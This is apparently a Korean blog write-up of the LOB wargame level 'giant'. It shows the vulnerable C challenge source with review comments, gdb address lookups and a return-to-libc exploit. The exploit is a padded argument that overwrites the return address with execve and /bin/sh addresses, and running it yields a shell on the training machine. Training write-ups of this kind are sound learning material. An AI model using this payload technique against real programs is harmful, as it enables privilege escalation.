  • [lob] bugbear -> giant
    공부/LOB 2014. 7. 30. 20:07

    [bugbear@localhost bugbear]$ cat giant.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - giant
            - RTL2
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>

    /*
     * LOB "giant" challenge binary (RTL2).
     *
     * Reads argv[1], derives the address of execve in the target libc by
     * running two shell pipelines through popen(), requires bytes 44..47 of
     * argv[1] to equal that address, and then copies argv[1] into a 40-byte
     * stack buffer with strcpy().
     *
     * Notes for the reader:
     *  - Declared with an implicit int return type (pre-C99 style) and falls
     *    off the end without a return statement.
     *  - memcpy() and strcpy() are used, but <string.h> is not among the
     *    includes above.
     *  - argv[1] is the untrusted input; its length is never checked.
     *
     * argc/argv: standard program arguments.
     * Exits with status 0 on both error paths (missing argument, wrong bytes).
     */
    main(int argc, char *argv[])
    {
        char buffer[40];      /* 40 bytes, but fgets() below is told 255 and strcpy() is unbounded */
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;   /* numeric values parsed into pointers via "%x" */
        char *ret;            /* bytes 44..47 of argv[1], compared against execve_addr */

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        // gain address of execve
        // NOTE(review): the libc base is read from ldd's output for a different
        // binary (/home/giant/assassin), presumably on the assumption that it
        // maps libc at the same address as this process — confirm.
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
        // fp is not checked for NULL; fgets() is given a size of 255 for a
        // 40-byte buffer, so a long line would overflow it.
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)", &lib_addr);   /* "%x" expects unsigned int *, not char ** */
        fclose(fp);   /* a popen() stream should be closed with pclose(), not fclose() */

        // Same pattern: unchecked popen(), over-sized fgets(), fclose() on a popen() stream.
        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x", &execve_offset);
        fclose(fp);

        // The symbol offset was parsed as a pointer and is cast back to int
        // for the addition; relies on int and pointer being the same width.
        execve_addr = lib_addr + (int)execve_offset;
        // end

        // Reads argv[1][44..47] without first checking that argv[1] is at
        // least 48 bytes long — an out-of-bounds read for shorter arguments.
        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
            printf("You must use execve!\n");
            exit(0);
        }

        // Unbounded copy of argv[1] into the 40-byte buffer: argv[1] is
        // already required to be >= 48 bytes by the check above, so this
        // always writes past the end of buffer. This is the overflow the
        // challenge is built around.
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
    }
    [bugbear@localhost bugbear]$ gdb giant
    (gdb) p execve
    $2 = {<text variable, no debug info>} 0x400a9d48 <__execve>
    (gdb) p system
    $1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
    (gdb) p exit
    $1 = {void (int)} 0x400391e0 <exit>
    (gdb) q
    [bugbear@localhost bugbear]$ ./find
    /bin/sh : 0x400fbff9
    (gdb) x/s 0xbffffff7    // stack 끝에 들어가는, execve의 두번째 인자로 들어갈 값
    0xbffffff7:     "廈\017@"
    (gdb)
    ./$"`python -c'print "\xf9\xbf\x0f\x40"'`" "`python -c'print "a"*44+"\x48\x9d\x0a\x40"+"AAAA"+"\xf9\xbf\x0f\x40"+"\xf7\xff\xff\xbf"+"\xfc\xff\xff\xbf"'`"



    payload = 더미 44byte + execve 주소 4byte(\x48\x9d\x0a\x40) + 더미 4byte (AAAA) + /bin/sh 주소 4byte (\xf9\xbf\x0f\x40) + 0xbffffff7 (execve 두번째 인자, 4byte) + 0xbffffffc (4byte)
    [bugbear@localhost bugbear]$ ./$"`python -c'print "\xf9\xbf\x0f\x40"'`" "`python -c'print "a"*44+"\x48\x9d\x0a\x40"+"AAAA"+"\xf9\xbf\x0f\x40"+"\xf7\xff\xff\xbf"+"\xfc\xff\xff\xbf"'`"
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH?
    @AAAA廈@?웠
    bash$ my-pass
    euid = 514
    one step closer
